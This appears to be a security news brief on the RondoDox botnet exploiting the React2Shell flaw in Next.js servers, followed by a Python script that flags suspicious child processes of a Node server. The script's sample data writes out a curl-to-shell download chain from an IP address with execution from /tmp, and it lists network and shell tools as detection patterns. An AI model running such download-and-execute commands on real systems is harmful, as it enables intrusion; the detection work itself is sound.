The RondoDox botnet is actively exploiting the React2Shell vulnerability to compromise internet-exposed Next.js servers and deploy malware. Beyond RondoDox's large-scale, automated exploitation of the kind used against IoT devices, the flaw is also being used in targeted attacks by North Korean hackers; together the activity affects thousands of internet-exposed assets.
Key points
- RondoDox exploits the React2Shell flaw to infect Next.js servers with malware and coinminers.
- The campaign has moved through phases of reconnaissance, automated exploitation, and large-scale deployment across IoT devices.
- More than 94,000 internet-exposed assets are assessed as vulnerable to React2Shell, and exploitation attempts were reported frequently in December.
- After probing a server, RondoDox deploys payloads including coinminers, botnet loaders, and Mirai variants.
- Recommendations: patch React2Shell on exposed Next.js servers, isolate IoT devices from the rest of the network, and monitor for suspicious processes on affected hosts.
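The last recommendation, monitoring for suspicious processes, is the one an operator can act on before a patch window. The example below is added here to illustrate it; it is not code from the report, from RondoDox analysis, or from the Next.js project. It assumes a process snapshot in the shape of `ps -eo pid,ppid,comm,args` (the rows are constructed, including the IP address and paths) and flags descendants of the Node.js server process that look like a download-and-execute dropper chain rather than normal server work. The heuristics (shell or downloader spawned under the web server, a `curl`/`wget` pipeline into a shell, execution from a world-writable directory) are generic post-exploitation patterns, not a RondoDox signature.

```python
"""Process-lineage heuristic for a Next.js host (added illustration).

A server-side RCE in a Next.js app executes inside the Node.js process, so
the tell-tale is not the node process itself but what it spawns.  This scans
a ps-style snapshot, finds the server process, and reports suspicious
descendants.  All constants and sample data are assumptions for the example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    comm: str
    args: str


# Assumed: the Next.js server runs as `node ... next start`.  Match your own
# process manager (pm2, systemd unit, container entrypoint) in practice.
SERVER_COMM = "node"
SERVER_ARG_HINT = "next"

SUSPECT_SHELLS = {"sh", "bash", "dash", "ash", "busybox"}
SUSPECT_TOOLS = {"curl", "wget", "tftp", "nc", "chmod"}
# Generic dropper patterns, not a RondoDox-specific signature.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
WORLD_WRITABLE_PATH = re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/\S+")

# Constructed snapshot: a Next.js server that has spawned a download chain,
# plus an unrelated interactive ssh session that must NOT be flagged.
SAMPLE_PS = """\
PID   PPID COMMAND ARGS
1     0    systemd /sbin/init
812   1    node    node /app/node_modules/.bin/next start -p 3000
901   812  sh      sh -c curl -s http://198.51.100.7/x.sh | sh
905   901  curl    curl -s http://198.51.100.7/x.sh
906   901  sh      sh
907   906  chmod   chmod +x /tmp/.x/arm7
910   906  sh      sh /tmp/.x/arm7
950   1    sshd    sshd: user [priv]
960   950  bash    -bash
"""


def parse_ps(text: str) -> list[Proc]:
    """Parse ps rows; the header (first token not numeric) is skipped."""
    procs = []
    for line in text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 4 or not parts[0].isdigit():
            continue
        procs.append(Proc(int(parts[0]), int(parts[1]), parts[2], parts[3]))
    return procs


def server_pids(procs: list[Proc]) -> set[int]:
    return {p.pid for p in procs if p.comm == SERVER_COMM and SERVER_ARG_HINT in p.args}


def descendants(procs: list[Proc], roots: set[int]) -> list[Proc]:
    """Every process whose ancestor chain reaches one of `roots`."""
    by_parent: dict[int, list[Proc]] = {}
    for p in procs:
        by_parent.setdefault(p.ppid, []).append(p)
    out, seen, stack = [], set(), list(roots)
    while stack:
        for child in by_parent.get(stack.pop(), []):
            if child.pid not in seen:
                seen.add(child.pid)
                out.append(child)
                stack.append(child.pid)
    return out


def find_suspicious(procs: list[Proc]) -> list[tuple[int, str, list[str]]]:
    """Return (pid, args, reasons) for suspicious descendants of the server."""
    findings = []
    for p in descendants(procs, server_pids(procs)):
        reasons = []
        if p.comm in SUSPECT_SHELLS:
            reasons.append("shell spawned under web server")
        if p.comm in SUSPECT_TOOLS:
            reasons.append(f"{p.comm} spawned under web server")
        if PIPE_TO_SHELL.search(p.args):
            reasons.append("download piped to shell")
        if WORLD_WRITABLE_PATH.search(p.args):
            reasons.append("references world-writable directory")
        if reasons:
            findings.append((p.pid, p.args, reasons))
    return sorted(findings)


def scan(ps_text: str) -> list[tuple[int, str, list[str]]]:
    return find_suspicious(parse_ps(ps_text))


if __name__ == "__main__":
    for pid, args, reasons in scan(SAMPLE_PS):
        print(f"pid {pid}: {args!r}  <- {', '.join(reasons)}")
```

On the constructed snapshot the chain `sh -c curl ... | sh`, the `curl`, the second `sh`, the `chmod` and the execution from `/tmp` are all reported, while the operator's `bash` under `sshd` is not, because only the server's lineage is examined. A point-in-time `ps` snapshot misses short-lived children, so in production the same lineage rule belongs on exec events from auditd, eBPF or an EDR rather than on periodic polling; and any legitimate API route or build step that shells out on the server will need an allowlist to avoid false positives.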